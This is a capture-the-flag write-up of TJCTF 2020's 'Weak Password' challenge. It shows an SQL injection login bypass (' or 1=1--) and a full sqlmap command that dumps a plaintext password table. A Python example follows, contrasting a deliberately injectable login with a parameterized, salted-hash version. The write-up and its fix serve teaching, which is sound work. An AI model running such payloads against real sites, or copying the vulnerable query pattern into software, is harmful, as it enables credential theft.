TJCTF2020 - Weak Password

Posted on Tue. 02 June 2020 in CTF

Solves: 204

Points: 20

Written by saisree

It seems your login bypass skills are now famous! One of my friends has given you a challenge: figure out his password on this site. He's told me that his username is admin, and that his password is made up of only lowercase letters and numbers. (Wrap the password with tjctf{...})

We have a standard login page with two fields: username and password. We need to recover the admin flag.


Let's try a standard SQLi payload: ' or 1=1--


We are logged in, so the form's code is vulnerable. This time, I used sqlmap to dump the table and get the password:

sqlmap https://weak_password.tjctf.org/login --method=POST --data "username=admin&password=admin" -p "password" --not-string="Wrong" --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0" --tamper=space2comment --level 5 --risk 3 --tables --dump -T userandpassword

Database: SQLite_masterdb
Table: userandpassword
[6 entries]
+----+-----------------------+---------------------+
| id | password              | username            |
+----+-----------------------+---------------------+
| 1  | blindsqli14519        | admin               |
| 2  | random_passwd         | random_user         |
| 3  | evenmorerandom_passwd | evenmorerandom_user |
| 4  | blindsqli14519        | admin               |
| 5  | random_passwd         | random_user         |
| 6  | evenmorerandom_passwd | evenmorerandom_user |
+----+-----------------------+---------------------+

We got the flag: tjctf{blindsqli14519}.
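
Why the payload was accepted and how the login should have been written, as an added example that is not the challenge's code. The server-side query shape, the function names, the stored values and the extra salt and pw_hash columns are assumptions; only the table and column names and the payload come from the write-up.

```python
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "' or 1=1--"  # the input tried in the write-up

def kdf(password, salt):
    # Salted, slow hash so a dumped table does not reveal the password itself.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)

def make_db():
    # Constructed in-memory stand-in for the dumped table; all stored values are made up.
    # The salt and pw_hash columns are additions used only by the hardened login.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE userandpassword (id INTEGER PRIMARY KEY, "
               "username TEXT, password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO userandpassword (username, password, salt, pw_hash) "
               "VALUES (?, ?, ?, ?)",
               ("admin", "constructed_secret", salt, kdf("constructed_secret", salt)))
    return db

def login_vulnerable(db, username, password):
    # Assumed "before": input is pasted into the SQL text, so a quote ends the
    # string literal and the rest of the input is parsed as SQL.
    sql = ("SELECT id FROM userandpassword "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return db.execute(sql).fetchone() is not None

def login_hardened(db, username, password):
    # Bound parameter: the input is only ever compared as a value.
    row = db.execute("SELECT salt, pw_hash FROM userandpassword WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(kdf(password, salt), stored)

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", login_vulnerable), ("hardened", login_hardened)):
        print(name, "payload accepted:", fn(db, "admin", PAYLOAD))
        print(name, "real password accepted:", fn(db, "admin", "constructed_secret"))
```

The hardened version addresses both weaknesses visible in the write-up: the injectable query and the plaintext password column that made the dump immediately useful.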